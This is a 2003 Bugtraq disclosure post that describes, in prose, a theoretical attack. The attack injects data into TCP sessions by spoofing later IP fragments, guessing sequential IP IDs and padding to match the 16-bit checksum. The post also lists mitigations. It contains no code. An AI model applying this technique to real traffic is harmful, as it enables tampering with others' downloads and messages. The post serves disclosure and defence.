Date: Thu, 11 Dec 2003 00:28:28 +0100 (CET) To: bugtraq@securityfocus.com Good morning, I am not quite sure there was no prior discussion of this problem, but I could not find anything even remotely related, and so I think it makes sense to post here. This post roughly describes a thought I had recently - and I have to admit this is pure theory, even though it should be fairly easy to turn this into a practical attack. Blind spoofing, hijacking and data insertion into TCP/IP sessions, although considered by some folks to be a threat of the past, still has some impact potential; I have provided some arguments to support this belief in my followup TCP/IP ISN analysis, in section 2, and I bet there it is just the top of an iceberg [ http://lcamtuf.coredump.cx/newtcp/#risks ]. Closing all the attack venues by deploying "proper" cryptography is not always feasible and easy, and even then, the protection is not complete - the DoS potential remains. Without cryptography, the integrity of TCP/IP sessions is protected only by a small set of parameters that are - hopefully - not known to a person not involved in the communications, and offer enough possible values to make brute-force attacks usually not feasible. In practice, the Internet largely relies on the correctness and unpredictability of the initial sequence number generation algorithms used in TCP/IP stacks on various systems and devices. I have done some research on the quality of those implementations, as some of you may recall; so did others, and the situation have greatly improved in the past 5 years or so, although it is still not quite what we would like it to be. It is, however, expected that all mainstream operating systems offer a reasonable ISN strength, and thus are not susceptible to trivial TCP/IP stream invasion. There seems to be a more fundamental problem, however, a problem that renders sequence numbers and their quality practically irrelevant in certain common scenarios. Consider the following: Bob sends a TCP/IP ACK packet to Alice, with a data payload and within an established session, of which session the attacker is aware (attacker-induced or server to server traffic, perhaps). Bob's packet exceeds the MTU somewhere en route (be it on some WAN interface, or on a local PPPoA, PPPoE or VPN interface), a situation not quite unheard of; the IP packet gets fragmented in order to be delivered successfully. The first IP fragment would carry the beginning of the TCP packet, including port numbers, sequence number, and other information that may be relatively difficult for a third party (the attacker) to guess otherwise. The other fragment (fragments) of Bob's packet carry the remaining section of the TCP/IP payload, and would be put back together with the headers and previous sections of the packet once received by Alice. Here is where the attacker strikes: he may spoof the second IP fragment, instead of attempting to determine the sequence number, and insert data into the TCP payload. There are only two problems he would face: 1. Figuring out the IP ID value. Usually a minor inconvenience, since a majority of systems use sequential numbers, and so it is possible to guess the next value with no effort. 2. Sending a fragment that would, after reassembly, still validate against TCP/IP checksum in the headers. The only real unknown is the sequence (and perhaps acknowledgment) number in there - the remainder can be usually either predicted to a degree, or simply overwritten with overlapping fragments, but the sequence number cannot be, for obvious reasons. There are two approaches to the latter problem. Since the checksum is only 16 bits, it might be reasonable to simply trust your luck, rinse and repeat. The second approach relies on targeting a known fragment of the payload: consider the victim is downloading a known file or receiving a known e-mail message, and the attacker only wants to replace this known fragment with malicious code / contents. The attacker may calculate a partial checksum of the data, and then produce a replacement fragment that would contain information that checksums to the same partial checksum (which can be achieved for arbitrary data using up to two padding bytes, because the checksum algorithm is neither cryptographically secure, nor offers a sufficient search space to withstand brute-force). To summarise... the attack seems to be fairly practical, at the very least significally decreasing the search space, at the very best, effectively disabling any session integrity protection gained from unpredictable ISNs. There are two major mitigating factors for this kind of attacks: 1. Path MTU discovery (DF set) prevents fragmentation [*]; some modern systems (Linux) default to this mode - although PMTU discovery is also known to cause problems in certain setups, so it is not always the best way to stop the attack. [*] Also note that certain types of routers or tunnels tend to ignore DF flag, possibly opening this vector again. 2. Random IP ID numbers, a feature of some systems (OpenBSD?), although also risky (increasing reassembly collission probability), make the attack more difficult. In the situation when it is necessary to brute-force all bits of the checksum, and all bits of the IP ID, the complexity of this data injection method starts to be comparable to full 32-bit ISN brute-force - usually not feasible. In the likely situation it is not necessary to brute force all checksum variants, the feature becomes only an inconvenience, raising the bar only slightly. Note that this has nothing to do with old firewall bypassing techniques and other tricks that used fragmentation to fool IDSes and so on - mandatory defragmentation of incoming traffic on perimeter devices will not solve the problem.